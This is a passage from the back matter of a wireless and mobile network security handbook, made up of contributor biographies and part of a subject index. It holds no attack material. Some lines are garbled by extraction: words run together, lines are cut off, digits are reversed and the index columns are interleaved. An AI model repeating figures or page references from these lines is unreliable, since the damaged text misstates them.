University of Electronic Science and Technology of China (UESTC). He received his BEng degree from
UESTC in 1996, and PhD degree from Nanyang Technological University (NTU), Singapore in 2005.
HehasexperienceasaR&Dengineerinthefieldofcomputercommunications,andasaresearch
in the Network Technology Research Center, NTU. His research focuses on ad hoc/sensor networks,
wireless mesh networks, and broadband wireless networks.
Mo Li received the BE from Beijing University of Posts and Telecommunications. Then, he worked
for Lucent Technologies and Computer Associates (CA), where he has been involved in the design of
system architectures for DWDM/SDH/IP Backbone O&M systems. He is currently working toward the
PhD at the Faculty of Engineering, University of Technology, Sydney. His research interests include
handover management and trust-assisted networking.
Xinghua Li obtained his ME and Ph D degrees in computer architecture and computer application
from Xidian University (Xi’an) in 2004 and 2006, respectively. Currently, Xinghua Li is the lecturer of
the School of Computer of Xidian University. His research interests include information and network
security.
Zheng-Ping Li received the BE degree at Department of Electronics and Information, Lanzhou

Railway University, Lanzhou, China, in 2000. He is currently working toward the PhD degree in the
School of Telecommunication Engineering, Beijing University of Posts and Telecommunications, Bei-
jing, China. His research interests include medium access control, routing, and intrusion detection in
wireless mesh networks.

Shiguo Lian, member of IEEE, SPIE, and EURASIP, got his PhD degree in multimedia security
from Nanjing University of Science and Technology in July 2005. He was a research assistant at City
University of Hong Kong from March to June in 2004, studying on multimedia encryption. He has
being with France Telecom R&D Beijing since July 2005, focusing on multimedia content protection,
including digital rights management (DRM), image or video encryption, watermarking and authentica-
tion, and so forth.
Chuang Lin is a professor and the former head of the Department of Computer Science and Technol-
ogy, Tsinghua University, Beijing, China. He received his PhD degree in computer science from Tsinghua
University in 1994. Professor Lin is a senior member of the IEEE, the Chinese Delegate in TC6 of IFIP,
and has served as associate editor for several journals. His current research interests include computer
networks, performance evaluation, logic reasoning, and Petri net theory and its applications. He has
co-authored more than 200 papers in research journals and IEEE conference proceedings in these areas
and has published three books.
Bin Lu is an assistant professor in the Department of Computer Science at West Chester University
of Pennsylvania. Dr. Lu received her BS (1996) and MS (1998) degrees in computer science from Harbin
Institute of Technology, China, and her PhD (2005) in computer science from Texas A&M University.
Her research interests include network security, quality of service, and wireless networks.
Jianfeng Ma received his BS degree in mathematics from Shaaxi Normal University (Xi’an) in 1985,
and obtained his ME and PhD degrees in computer software and communications engineering from
Xidian University (Xi’an) in 1988 and 1995, respectively. Professor Ma is a member of the executive
council of the Chinese Cryptology Society. Currently, Professor Ma is the director of the Ministry of
Education Key Laboratory of Computer Networks and Information Security, and he is the dean of the
School of Computer of Xidian University. His research interests include information security, coding
theory, and cryptography.
Ismat K. Maarouf obtained his BS degree in computer engineering in 2005 and an MS degree in
computer networks in 2007 from King Fahd University of Petroleum and Minerals (KFUPM), Dhahran,
Saudi Arabia. He is currently working as a research assistant in the Computer Engineering Department
in KFUPM. His main research interests include mobile ad hoc and wireless sensor networks, computer
networks security, reputation systems, and WLAN-Cellular networks integration.
Michael Maaser received his Master’s degree in computer science from Brandenburg University
of Technology Cottbus in 2004. After his thesis about negotiation of privacy he started as a research
scientist at IHP. His research focuses on privacy preserving techniques mainly, but not limited to, the
fieldoflocationbasedservices.Throughouttherecentyears 2 hehassevenpublication
theareaofprivacyandtwofiledpatents.
Ashraf S. Hasan received the BSc degree in electrical and computer engineering from Kuwait Uni-
versity in 1990, and the MEng in engineering physics (computer systems) from McMaster University,
Hamilton, Canada in 1992. He received his PhD in systems and computer engineering from Carleton
University, Ottawa, Canada in 1997. During 1997-2002, he was with Nrtel Networks Research and De-

velopment where he focused on development and evaluation of radio resource management algorithms
for broadband and 3G networks. Since 2002, he has been with the Computer Engineering Department at
King Fahd University of Petroleum and Minerals, Dhahran, KSA as an assistant professor. His research
interests include radio resource management for 3rd and 4th G networks, wireless local area networks,
and integration of heterogeneous networks.
Amel Meddeb Makhlouf received the engineering eegree (in 2001) and the Master degree in com-
munications (in 2003) from the Engineering School of Communications (SUP’COM, Tunisia). She is
member of the Communication Networks and Security (CN&S) Research Laboratory (University of
November 7th, Carthage, Tunisia). Since September 2004, she has joined the Engineering School of
Communications (SUP’COM, TUNISIA) as a teacher assistant in telecommunications.
Leonardo A. Martucci is a doctoral student at Karlstad University, Sweden, where he works with
research on privacy enhancing technologies for wireless environments. He is involved in education,
research,deployment,andindustrialprojectsinthefieldofwirelessnetworksecuri
2001. Mr. Martucci’s research is focused especially in privacy problems in dynamic and distributed
environments, such as mobile ad hoc networks. He holds a Licentiate in engineering from Karlstad
University (2006), a Masters in electrical engineering (2002), and an electrical engineer degree (2000)
from University of São Paulo, Brazil.
Geyong Min is a senior lecturer in the Department of Computing at University of Bradford, United
Kingdom. He received the PhD degree in computing science from University of Glasgow, UK, in 2003.
Hisresearchinterestsincludeperformancemodelingandsimulation,networktrafficen
computing and wireless networks, multimedia systems, and information security. Dr. Min has published
over 100 research papers in the well-established journals and conferences. Dr. Min serves on the edito-
rial board of the International Journal of Wireless and Mobile Computing and Journal of Simulation
Modeling Practice and Theory, and serves as the guest editor for 10 international journals.
Lawan A. Mohammed is currently an assistant professor in Computer Science and Engineering

Technology Department at King Fahd University of Petroleum and Minerals (HBCC Campus), Saudi
Arabia. His main research interests are in the design of authentication protocols for both wired and
wireless networks, wireless mobility, group oriented cryptography, smartcard security, and mathemati-
cal programming.
Rebecca Montanari graduated from University of Bologna, Italy, where she received PhD degree in
computer science engineering in 2001. She is now an associate professor of computer engineering at the
University of Bologna. Her research primarily focuses on policy-based networking and systems/service
management, mobile agent systems, security management mechanisms, and tools in both traditional
and mobile systems. She is member of IEEE and AICA.
Luminita Moraru is currently a PhD candidate in the TCS-sensor lab of the Computer Science De-
partment of the University of Geneva. She received a BS degree in electrical engineering and computer
science from the Polytechnic University of Bucharest, in 2004, and a MS degree in computer science
(embedded systems) from the University of Science and Technology of Lille, in 2005. Her research in-

terests are in sensor networks, mobile ad hoc networks, security, and reputation based trust. Her current
research focuses on security and QoS of routing protocols for sensor networks.
A. R. Naseer is an assistant professor in Department of Computer Engineering at King Fahd Uni-

versity of Petroleum and Minerals, Dhahran, KSA. He received the PhD degree in computer science
and engineering from Indian Institute of Technology (IIT), Delhi, India, in 1996. He is a recipient of
“Best Student Paper Award” at the IEEE/ACM 7th International Conference on VLSI Design, 1994 for
his doctoral research paper in the area of FPGA based synthesis. His current research interests include
wireless sensor networks security, reputation systems, computer networks, design automation of digital
systems, FPGA based synthesis, computer architecture, parallel computing, and multicore processor
architectures. He has published several refereed journal and conference papers on related topics.
Huansheng Ning received BS degree from Anhui University, China, in 1996, and a PhD degree from
Beihang University, China, in 2001. From 2002 to 2003, he was the CTO of Aerospace Golden Card
Company. Since 2004, he has been an associate professor in Beihang University. His current research
interests include RFID, EM computing, ITS, and so forth.
Josef Noll holds a professor stipend from the University of Oslo in the area of mobile services.
Working areas include mobile authentication, wireless broadband access, personalized services, and the
evolution to 4G systems. He is also senior advisor in Movation, Norway’s leading innovation company
for mobile services. Previously he was senior advisor/group leader at Telenor R&I, project leader of
“Operators’ Vision on Systems Beyond 3G” and other international projects, use-case leader in the EU
“Adaptive Services Grid (ASG)” project, and has initiated a.o. the EU’s 6th FP ePerSpace and several
ITEA and Eurescom projects.
Christoforos Ntantogian received his BSc degree in computer science and telecommunications
from the Department of Informatics and Telecommunications, University of Athens, Greece. In 2006 he
finishedhispostgraduatestudiesincomputersystemstechnologyinthesamedepartm
he is a PhD student. Since 2004 he has been working for the Communication Networks Laboratory of
the University of Athens and he is a member of the Security Group.
Sangheon Pack received the BS (2000) and PhD (2005) degrees from Seoul National University,
both in computer engineering. Since March 2007, he has been an assistant professor in the School of
Electrical Engineering, Korea University, Korea. From July 2006 to February 2007, he was a postdoctoral
fellow at Seoul National University. From 2005 to 2006, he was a postdoctoral fellow in the Broadband
Communications Research (BBCR) Group at University of Waterloo, Canada. His research interests
include mobility management, multimedia transmission, and QoS provision issues in next-generation
wireless/mobile networks. He is a member of the ACM and the IEEE.
Luis E. Palafox received his BS in computer engineering from the University of Baja California
in 1997. He also received his MS degree in digital systems from the National Polytechnic Institute of
Mexico in 2002. In 2004, he enrolled in the PhD program in computer science program at the CICESE
Research Center in Ensenada. He is a faculty member of the School of Chemical Science and Engi-
neering at the University of Baja California since 1999. His areas of interest are computer networking,
embedded systems, wireless sensor networks, and digital signal processing.

Cyrus Peikari, MD, is a practicing physician and author of several leading technical security books,
including Security Warrior from O’Reilly and Maximum Wireless Security from SAMS. In his work
withAirscannerCorporationhepioneeredsomeofthefirstantivirussolutionsforh
devices. His main area of research is in reverse engineering of “airborne viruses.” Dr. Peikari has been
a popular speaker and keynote at several major security conferences.
Steffen Peter received his diploma in computer science from the Brandenburg University of Tech-
nology at Cottbus (BTU) in 2006. In 2006 he joined the IHP in Frankfurt (Oder), where he was also
involved in developing a hardware TCP accelerator as a student. In his diploma thesis he was developing
hardware cryptography accelerators. He is a member of the mobile middleware group, working on the
researchofsolutionsforsecurityissuesinwirelesssensornetworks.Hehasfiledthr
authored two technical papers. His research interests include security and privacy in mobile environ-
mentsfocusingonefficienthardwareimplementation.
Krzysztof Piotrowski received his Master in computer science from the University of Zielona Gora
(Poland) in 2004. Since 2004, he has been with the IHP in Frankfurt (Oder) where he is a member of
the mobile middleware group. He published 15 refereed technical articles in the area of security and
privacy. His research interests include mobile/wireless communication (focus on privacy and security
issues), especially on resource-constrained devices (wireless sensor networks).
Olivier Powell is a senior researcher at the Computer Science Department of the University of Ge-
neva in Switzerland. He was previously a Swiss National Research Foundation fellow at the Research
and Academic Computer Technology Institute and the University of Patras in Greece. Previously, he
was a post-doctoral research associate at the TCS-sensor lab of the University of Geneva. He received
aPhDincomputerscienceinthefieldofcomplexitytheoryfromtheUniversityofGenevaand
degree in mathematics from the same university. His current research interest is algorithmic aspects of
wireless sensor networks.
Göran Pulkkis, Dr. Tech. from Helsinki University of Technology, is presently senior lecturer in
computer science and engineering at the Department of Business Administration, Media, and Technology
at Arcada Polytechnic, Helsinki, Finland. His current research interests are network security, applied
cryptographic, and quantum informatics
Slim Rekhis holds a PhD and a Master degree in telecommunications from the Engineering School
of Communications (SUP’COM, Tunisia). He is conducting research activities in the area of digital
investigation of security incidents, formal modelling, intrusion detection and tolerance, and wireless
security. Since September 2005, Dr. Rekhis has been an assistant professor in telecommunications.
Angelos Rouskas received the Diploma in Electrical Engineering from the National Technical Uni-
versity of Athens (NTUA), the MSc in communications and signal processing from Imperial College,
London, and the PhD in electrical and computer engineering from NTUA. He is an assistant professor in
the Department of Information and Communication Systems Engineering of the University of Aegean,
Greece, and director of the Computer and Communication Systems Laboratory. Dr. Rouskas has been
involved in several European and Greek funded research projects and has published extensively in the
fieldofmobileandwirelesscommunicationnetworks.

Miguel A. Ruiz was born in Valdepeñas (Ciudad Real), Spain. He received the Technical Telecom-
munication Engineering and Telecommunication Engineering degrees from the Polytechnic School
at the University of Alcala (Madrid), Spain, in 1999 and 2003, respectively. He is currently working
toward the PhD degree in telecommunications at University Alcala. Since 2000, he has been working
in the Electromagnetic Compatibility Laboratory as technical manager at the High Technology and
Homologation Center (CATECHOM), research support center of the University Alcala. Furthermore, he
is an assistant lecturer at the Electronic Department of the same university. His main research interest
is EMC effect on electrical and electronic automotive systems.
Kumbesan Sandrasegaran holds a PhD in electrical engineering from McGill University (Canada)
(1994), a Masters of Science degree in telecommunication engineering and information Systems from
EssexUniversity(UK)and ,) 8 9 1 ( aBachelorofScience(honors)degreeinelectricalengineeringfirst (
class) (UZ) (1985). Dr Sandrasegaran is a professional engineer (Pr.Eng) (ECSA) and has more than
20 years experience working either as a practitioner, researcher, consultant, and educator in telecom-
munication networks. During this time, he has focused on the planning, optimization, forecasting,
security, and network management of telecommunication networks. At present, he is program head of
ICT Engineering at the Faculty of Engineering, University of Technology Sydney (UTS).
David Sanguino was born in Talavera de la Reina (Toledo), Spain. He received the technical tele-
communication engineering degree from the Polytechnic School at the University of Alcala (Madrid),
Spain, in 2004. He is currently working toward the telecommunication engineering degree at University
Alcala (UAH). Since 2005, he has been working in the Electromagnetic Compatibility Laboratory as
Technician at the High Technology and Homologation Center (CATECHOM), research support center
of the University of Alcala.
Boot-Chong Seet received his PhD in 2005 from the School of Computer Engineering, Nanyang
Technological University (NTU), where he is currently serving as an instructional faculty. Prior to join-
ing NTU, he was with the Singapore-MIT Alliance (SMA), National University of Singapore, where
he worked as a research fellow for a pilot project on adaptive location-aware computing. His current
research interests include ad hoc, mesh, and sensor networks, mobile peer-to-peer computing, vehicular
communications, and emerging broadband wireless technologies. He has over 20 refereed publications
and one patent pending. He is a member of IEEE and ACM SIGMOBILE.
Jean-Marc Seigneur is a senior researcher and lecturer at the University of Geneva. He received his
MScandPhDincomputersciencefromTrinityCollegeDublin.Hismorethaninternational 03 sc
publications cover ubiquitous computing security, trust, reputation, and privacy. He is an international
expert reviewer for French ANR security research projects and the European Commission. He worked
in Hewlett-Packard in France and China. He leads the http://www.trustcomp.org online community on
computational trust management with now more than 190 academic and industrial members. He has
provided technical consulting and presentations to many companies, among them, Philips, Ericsson,
SAP, and Amazon.
Moushumi Sharmin is currently a PhD student at University of Illinois. She received the MS degree
in computer science at Marquette University where she researched pervasive computing, security, and

privacy in the Ubicomp Research Lab. She completed the BS in computer science and engineering from
Bangladesh University of Engineering and Technology.
Nicolas Sklavos received the PhD degree in electrical and computer engineering, and the diploma in
electrical and computer engineering, in 2004 and 2000, respectively, both from the Electrical & Computer
Engineering Department, University of Patras, Greece. His research interests include cryptography,
wireless communications security, computer networks, and VLSI design. He holds an award for his
PhD thesis on “VLSI Designs of Wireless Communications Security Systems” from IFIP VLSI SOC
2003. He was the general co-chair of MobiMedia’07. He has participated to international journals and
conferences organization as program committee member and guest editor. Dr. N. Sklavos is a member
of the ACM, IEEE, IEE, the Technical Chamber of Greece, and the Greek Electrical Engineering So-
ciety.Hehasauthoredorco-authoreduptoscientific 90 articles,bookschapters,tutori
in the areas of his research.
Nilothpal Talukder is a graduate student in computer science at Marquette University where he re-
searches pervasive computing, security, and privacy in the Ubicomp Research Lab. He completed the BS
in computer science and engineering from Bangladesh University of Engineering and Technology.
Daniela Tibaldi graduated from University of Bologna, Italy, where she received her PhD degree
in computer science engineering in 2006. Her research activity is focused on middleware solutions for
supporting the secure service provisioning in mobile and heterogeneous environments. Since 2002 she
works at the DSAW – Direction and Development of Web Activities of the University of Bologna with
both technical and quality management responsibilities. One of the DSAW main tasks is to build the
University Web sites, services, and the corresponding technological, informative, and organizational
infrastructure to fully support University educational, academic, and administrative activities.
Tom Tofigh is a principal and technical member of the AT&T architecture team. He is responsible
for architecture studies and vendors technology evaluation. Currently, he supports the AT&T labs ad-
vanced services and architecture group. Tom has worked in semiconductor companies as director of
product management, director of software development, and has consulted and worked for a number
of start-ups and had responsibility for architecture and developments of switches and access products.
In addition Tom attended George Washington University and completed his doctoral course work in
electrical engineering and computer science graduate school. Furthermore, Tom has a judicial doctoral
degree from Northern Virginia Law School with emphasis in intellectual properties. Currently, Tom is
the founder and chair of the WiMAX Forum’s Application Architecture Working Group.
Alessandra Toninelli graduated from University of Bologna, Italy, where she is currently a PhD
student in computer science engineering. Her research interests focus on semantic-based middleware
supports for service provisioning, context-aware services, security solutions for pervasive environments,
policy-based service management, and mobile agent systems. She is a member of IEEE and ACM.
Denis TrĉekisprincipalinvestigatoratJozefStefanInstituteandhasbeeninvolved
computer networks, security, and privacy for almost 20 years. He has taken part in various European
projects, as well as domestic projects in government, banking, and insurance sectors. His bibliography

includes over one hundred titles, including works published by renowned publishers like Springer and
Wiley. D. Trcek has served (and still serves) as a member of various international boards, from editorial
to professional ones. He is inventor of a patented family of light-weight cryptographic protocols. His
interests include e-business, security, trust management, privacy, and human factor modelling.
Yu Wang received the PhD degree in computer science from Illinois Institute of Technology in
2004, and the BEng degree and the MEng degree in computer science from Tsinghua University, China,
in 1998 and 2000. He has been an assistant professor of computer science at the University of North
Carolina at Charlotte since 2004. His current research interests include wireless networks, ad hoc and
sensor networks, mobile computing, and algorithm design. He has published more than 50 papers in
peer-reviewed journals and conferences. Dr. Wang is a recipient of Ralph E. Powe Junior Faculty En-
hancement Awards from Oak Ridge Associated Universities.
Yawen Wei is a PhD candidate in the Department of Electrical and Computer Engineering at Iowa
State University. She obtained her BEng (2004) in electronic engineering from Tsinghua University,
China. Since then she has been doing research on localization security issues and location-based ser-
vices in wireless sensor networks.
Bing Wu is an assistant professor in the Department of Mathematics and Computer Science at

Fayetteville State University. Dr. Wu received his PhD and MS in the Department of Computer Sci-
ence and Engineering at Florida Atlantic University. His research interests include wireless ad hoc and
sensor networks, mobile computing, and network security. He has worked as research assistant for four
years at Motorola. He has published more than ten papers including refereed journal, book chapter, and
conference proceedings. He is a member of IEEE.
Jie Wu is a distinguished research professor at the Department of Computer Science and Engineer-
ing, Florida Atlantic University and a program director at US National Science Foundation. He has
published over 350 papers in various journals and conference proceedings. His research interests are
in the areas of wireless networks and mobile computing, routing protocols, fault-tolerant computing,
and interconnection networks. Dr. Wu was on the editorial board of IEEE Transactions on Parallel
and Distributed Systems and was a co-guest-editor of IEEE Computer and Journal of Parallel and
Distributed Computing. He served as the program co-chair for MASS 2004, program vice-chair for
ICDCS 2001, and program vice-chair for ICPP 2000. He was also general co-chair for MASS 2006 and
is general chair for IPDPS 2008. He is the author of the text Distributed System Design published by
the CRC press. He was also the recipient of the 1996-97, 2001-02, and 2006-07 Researcher of the Year
Award at Florida Atlantic University. Dr. Wu has served as an IEEE Computer Society Distinguished
Visitor and is the chairman of IEEE Technical Committee on Distributed Processing (TCDP). He is a
member of ACM and a senior member of IEEE.
Christos Xenakis received his BSc degree in computer science in 1993 and his MSc degree in
telecommunication and computer networks in 1996, both from the Department of Informatics and
Telecommunications, University of Athens, Greece. In 2004 he received his PhD from the University
of Athens (Department of Informatics and Telecommunications). Since 1996 he has been a member of
the Communication Networks Laboratory of the University of Athens and, currently, he is the head of
0
the Security Group. In addition, he is a lecturer (faculty of the Department of Technology Education
and Digital Systems) in the University of Piraeus, Greece.
Lu Yan is a research fellow at University College London and a Visiting Fellow at University of
Cambridge. Previously, he was with Department of Information Technologies in Åbo Akademi Univer-
sity, Distributed Systems Design Laboratory in Turku Centre for Computer Science (TUCS), Institute of
Microelectronics (IME) in Peking University. He holds visiting professor positions in both École Supéri-
eure d’Ingénieurs généralistes (ESIGELEC) and École Supérieure de Commerce de Rouen (ESC).
Laurence T. Yang is a professor in computer science at St Francis Xavier University, Canada. His
research includes high performance computing and networking, embedded systems, ubiquitous/perva-
sive computing, and intelligence. He has published around 250 papers in refereed journals, conference
proceedings, and book chapters in these areas. He has been involved in more than 100 conferences and
workshops as a program/general conference chair and more than 200 conference and workshops as a
program committee member. He served as the vice-chair of IEEE Technical Committee of Supercom-
puting Applications (TCSA) until 2004. Currently he is on the executive committee of IEEE Technical
Committee of Scalable Computing (TCSC), of IEEE Technical Committee of Self-Organization and
Cybernetics for Informatics, of IFIP Working Group 10.2 on Embedded Systems, and of IEEE Tech-
nical Committee of Granular Computing. He is also the co-chair of IEEE Task force on Intelligent
Ubiquitous Computing. In addition, he is the editors-in-chief of nine international journals and a few
book series. He is serving as an editor for around 20 international journals. He has been acting as an
author/co-author or an editor/co-editor of 30 books from Kluwer, Springer, Nova Science, American
ScientificPublishers,andJohnWileySons. & HehasreceivedthreeBestPaperAwards,aswell
IEEE 20th International Conference on Advanced Information Networking and Applications (AINA-06);
one IEEE Best Paper Award, 2007; one IEEE Outstanding Paper Award, 2007; Distinguished Achieve-
ment Award, 2005; Distinguished Contribution Award, 2004; Outstanding Achievement Award, 2002;
Canada Foundation for Innovation Award, 2003; and University Research/Publication/Teaching Award
00-02/02-04/04-06.
Hao Yin, is currently an associate professor with the Department of Computer Science and Tech-
nology, Tsinghua University, Beijing, China He received Ph.D. degrees in electrical engineering from
Huazhong University of Science and Technology, China in 2002. His research interests span broad aspects
of network architecture, P2P technology, wireless network, video coding, multimedia communication
over wireless network, and network security. He has published over 50 papers in refereed journal and
conferences. He is on editorial boards of Advances in Multimedia and AD HOC NETWORKS Journal,
and has been involved in organizing over 12 conferences.
Rong Yu was born in Guangdong, China, in 1979. He received his BE degree in communications
engineering from Beijing University of Post and Telecommunications (BUPT), Beijing, China, in 2002.
After that, he joined the Electronic Engineering Department of Tsinghua University, Beijing, China,
where he received his PhD degree at July 2007. His research interests include protocol design and per-
formance analysis of wireless sensor networks and board-band wireless multimedia networks.

Zhen Yu is a PhD candidate in the Department of Electrical and Computer Engineering at Iowa State
University. He obtained his BEng (1995) and MEng (2001) in electrical engineering from Shanghai Jiao
Tong University, China. He also received his MS in electrical engineering from Iowa State University
in 2003. Since then he has been researching security issues in wireless networks and distributed sys-
tems.
Said Zaghloul is currently a PhD candidate at the Technical University Carolo-Wilhelmina in Braun-
schweig, Germany. Prior to his PhD studies, he was with Sprint-Nextel as a telecommunication design
engineer mainly focusing on wireless IP infrastructures. During his employment at Sprint-Nextel, he
submitted two patents in the area of telecommunication protocols and received excellence awards. In
02, he received the first IEE award for his BSc graduation project in UMTS capacity planning. In
2003, he was granted a Fulbright Scholarship to pursue his MSc studies at the University of Kansas.
In 2005, Mr. Zaghloul received his MSc degree with honors. His research interests include wireless
protocols, IP technologies, and wireless communications.
Guo-Mei Zhu received the BE degree in communication engineering from ChongQing University
of Posts and Telecommunications, Chongqing, China, in 2002. She is currently pursuing her PhD degree
at the School of Telecommunication Engineering, Beijing University of Posts and Telecommunications,
Beijing, China under the supervision of Professor Geng-Sheng Kuo. Her current research interests in-
clude distributed intrusion detection for wireless networks, cross-layer communication protocol design
for wireless networks, next generation wireless networks, and wireless mesh networks.
Albert Y. Zomaya is currently the head of school and the CISCO systems chair professor of internet-
working in the School of Information Technologies, The University of Sydney. He is the author/co-author
of more than 300 publications and serves as an associate editor for several leading journals. Professor
Zomaya is the recipient of the Meritorious Service Award (in 2000) and the Golden Core Recognition
(in 2006), both from the IEEE Computer Society. He is a chartered engineer (CEng), a fellow of the
American Association for the Advancement of Science, the IEEE, and the Institution of Electrical En-
gineers (U.K.), and a distinguished engineer of the ACM.
Aneta Zwierko holds MSc and PhD in telecommunications from Warsaw University of Technology,
Poland. Her doctoral thesis “Cryptographic Protocols for Mobile Agent Systems with Applications” con-
cerned application of cryptographic protocols in mobile environment for providing integrity, anonymity,
and more complex services such as secure e-voting. Her current interest include zero-knowledge proofs
anditsapplication,identification,andauthenticationprotocols,anonymityandpriva
the agent systems, E/M-voting protocols, electronic payments, and AI and its application in security.

Index
Symbols additional authentication data (AAD) 785

address resolution protocol (ARP) 373, 749
(3G) cellular networks 364 ad hoc 661
(AKC) protocol 215 ad hoc collaborations 461
3GPP mobile broadcast/multicast service ad hoc gateway access control (AGAC) 509
(MBMS) 388 ad hoc key distribution center (AKDC) 500,
3GPP mobile broadcast multicast (MBMS) 384 509
3rd Generation Partnership Project (3GPP) 297 ad hoc network 652
3rd generation partnership project (3GPP) 318 ad hoc networks (ARAN) 420
4G security layer 288 ad hoc on-demand distance vector routing
4G security measures 286 (AODV) 435, 640
4G vulnerabilities 286 advanced encryption standard (AES) 304, 762,
A 784
AES encryption mode 768
AA-Mobile-Router-Answer (AMA) 401 Airespace network 716
AA-Mobile-Router-Local-Answer (AMLA) All-IP 283
402 ambient resource-constrained wireless comput-
AA-Mobile-Router-Request (AMR) 401 ing nodes 636
AA-Registration-Answer Command (ARA) American mobile phone system AMPS) 273
398 anomaly detection model 88
AA-Registration-Request Command (ARR) anomaly detection module (ADM) 540
398 anonymity 183
AAA server 715 anonymous authentication protocol (ANAP)
access control 45, 501 450
access networks (ANs) 280 anonymous dynamic source routing protocol
access point (AP) 78, 777 (AnonDSR) 438
access point (AP), rogue 80 anonymous on-demand routing (ANODR) 439
access points (AP) 441, 711 anonymous routing protocol for mobile ad hoc
acknowledgement (ACK) 418 networks (ARM) 440
active tag 725 Application interface (Ua) 384
Index
application program interface (API) 283 black-box protection 30

asymmetric cryptography 575 block RAM (BRAM) 266
auditing 46 Bluetooth 6–7, 15, 203, 283
authentication 45, 148, 501 bootstrapping 192
authentication, and cellular networks 197 bootstrapping interface (Ub) 383
authentication, and wireless networks 193 border gateway protocol (BGP) 369
authentication, authorisation, and accounting broadband wireless aAccess (BWA) 766
(AAA) system 176–188 broadband wireless networks 11
authentication, authorization, accounting Burmester-Desmedt (BD) 495
(AAA) 298 bursting of the Internet bubble 277
authentication, authorization, and accounting
(AAA) 395, 396 C
authentication, authorization, and accounting CableLabs 391
(AAA) system 158–175 Canetti-Krawczyk (CK) model 210
authentication, authorization, and accounting care-of-address (CoA) 396
framework (AAA) 283 CBC-MAC protocol (CCMP) 304
authentication, password 195 CCMP protocol 307
authentication, subscriber 177 cellular system 759
authentication algorithm 367 cellular system, and vulnerabilities in 81
Authentication and key agreement (AKA) 764 certificateauthorities 147, 311 (CA)
authentication and key agreement (AKA) 146, certificateauthority 375, 714(CA)
341, 383 certificaterevocationlist(CRL704
authentication authorization and accounting certificaterevocation list(CRL)
484
(AAA) 776 certificationauthority 483 (CA)
Authentication center (AuC) 341 certifying authority (CA) 451
authentication center (AuC) 290 challenge handshake authentication protocol
authentication centre (AuC) 320, 352 (CHAP) 160, 388, 779
authentication data request (ADR) 342 channel jamming 130
authentication header (AH) 680 cipher block chaining (CBC) 766
authentication key (AK) 766 circuit switched (CS) 321
authentication management 193 CK model 210
authentication reply (ARep) 398 clear-to-send (CTS) 418
authentication request (AReq) 398 cluster, formation of 85
authentication server 14 cluster-based network 658
authentication vectors (AVs) 381 Cluster formation 641
authorisation 45 cluster heads (CHs) 629
authorization key (AK) 201 code division multiple access (CDMA) 364,
388
B
code division multiple access 2000
bandwidth 29 (CDMA2000) 339
base station (BS) 365, 766 COMITY trust model 472
beyond third generation (B3G) 297 common security functions (CSF) 390
beyond third generation (B3G) mobile net- communication, eavesdropping 131
works 297 communication, faking / replay attack 131
binding acknowledgment (BA) 202 communication, man-in-the-middle attack 131
binding update (BU) 202 communication,nearfield104 (NFC)

Index
communication, securing of 146 decentralized key generation and distribution

communication, wireless 129 (DKGD) 500, 509
commutativecipher-baseden-routefiltering decentralized trust model 486
(CCEF) 630, 634 denial-of-service (DoS) 419, 451, 600, 762,
commutative watermarking and encryption 783
(CWE) 249 denial-of-service attacks 644
complementary code-keying (CCK 520 denial-of-service attacks (DoS) 699
complementary code-keying (CCK) 520 denial of service (DoS) 82, 373
compromised nodes 629 destination-sequenced distance-vector (DSDV)
computational trust 646 419
cone-based topology control (CBTC) 655 device driver 62
Conférence européenne des Administrations Diameter 158
des Postes et des Tèlécommunications Dictionary attack 783
(CEPT) 273 Diffie-Hellman(DH)483
CONFIDANT 421 Diffie-Hellman(DH)keyexchange146
confidentiality 500 Digitalcertificate 209
context-based middleware for trustworthy ser- digitalfingerprint 209
vices (COMITY) 470 digital rights management (DRM) 145, 237
converged network, and AAA 178 Digital signature 209
converged network, and authentication 181 digital signature 34, 416
CORE 421 direct current (DC) 521
core network (CN) 284, 352, 763 directed diffusion (DD) 642
correspondent nodes (CNs) 396 direction bit (DIRECTION) 356
counter mode (CM) 762 Direct sequence spread spectrum (DSSS) 760
counter mode with cipher block chaining discount anonymous on-demand routing (dis-
message authentication code protocol count ANODR) 440
(CCMP) 373 distributed anonymous secure routing protocol
credential (CR) 400 (ASRP) 441
credential fetching interface (Zh) 383 distributed key predistribution scheme (DKPS)
credit clearance service (CCS) 421 491
critical transmission range (CTR) 654 distributing system (DS) 697
cryptographic 649 distribution of authentication vector (DAV)
cryptographic keying material 636 342
cryptographic protocols 210 domain name system (DNS) 309
Cryptographic solutions 644 dynamic clustering technique: 641
cryptography 211, 482, 680 dynamicen-routefiltering (DEF) 634
630,
dynamichostconfigurationprotocol(DHCP)
D 777
Data encryption standard (DES) 766 Dynamic keying 645
data encryption standard (DES) 575 dynamic name system (DNS) 369
data integrity 501 Dynamic source routing (DSR) 419
dataovercableserviceinterfacespecification dynamic source routing (DSR) 435
for baseline privacy +interface (DOCSIS
E
BPI+) 373
data protection 313 e-banking 760
data protection-802.11i standard 304 e-commerce 760

Index
e-government 760 first-in-first-out(FIFO)342

E2E security 371 firsthandinformation(FHI)610
EAP authentication 783 flatstructure 656
EAP protocol 776 format independent encryption algorithm 239
eavesdropping 33, 131 forward error correction (FEC) 243
electromagnetic susceptibility (EMS) 684 fourth generation (4G) 272, 276, 391, 759
elliptic curve cryptography (ECC) 576 frame check sequence (FCS) 308
encapsulating security payload (ESP) 313, 680 frequency ranges for the next generation of
encapsulation security payload (ESP) 325 PLMN (FPLMTS) 274
encrypted function 31 frequent handoff region (FHR) 716
encryption 65 Full-IP 283
encryption, communication compliant 243
encryption, format independent 239 G
encryption, multimedia 236–255 Gabriel graph (GG) 656
encryption, partial audio 241 gateway general packet radio service (GPRS)
encryption, partial image 241 160
encryption, partial video 242 Gateway GPRS support node (GGSN) 299,
encryption method 779 341
end-to-end (E2E) 747 gateway GPRS support node (GGSN) 320,
end-to-end transmission 420 368, 381
energy starvation attack 643 gateway GSN (GGSN) 353
entire enterprise 716 GBA user security settings (GUSS) 384
entity recognition (ER) 646 GEA supports and the network (SGSN) 355
equipment identity register (EIR) 320, 352 GEA using the encryption key (GPRS-Kc),
error-correcting codes (ECC) 248 355
Euclidean distance 654 general packet radio servcie (GPRS) 344
European Telecommunications Standards Insti- general packet radio service (GPRS) 145, 300,
tute (ETSI) 300 320, 763
exclusion-basis systems (EBS) 603 general packet radio service (GRPS) 364
exclusion basis systems (EBS) 646 general packet radio services (GPRS) 351
expected response (XRES) 322 generation partnership project (3GPP) 379
extended service set (ESS) 697, 715 generic authentication architecture (GAA) 386
extensible authentication protocol (EAP) 711, generic bootstrapping architecture (GBA) 379,
761, 776 382
extensible authentication protocol method for Geometric topology 656
GSM subscriber identity modules (EAP- global MS Passport service 285
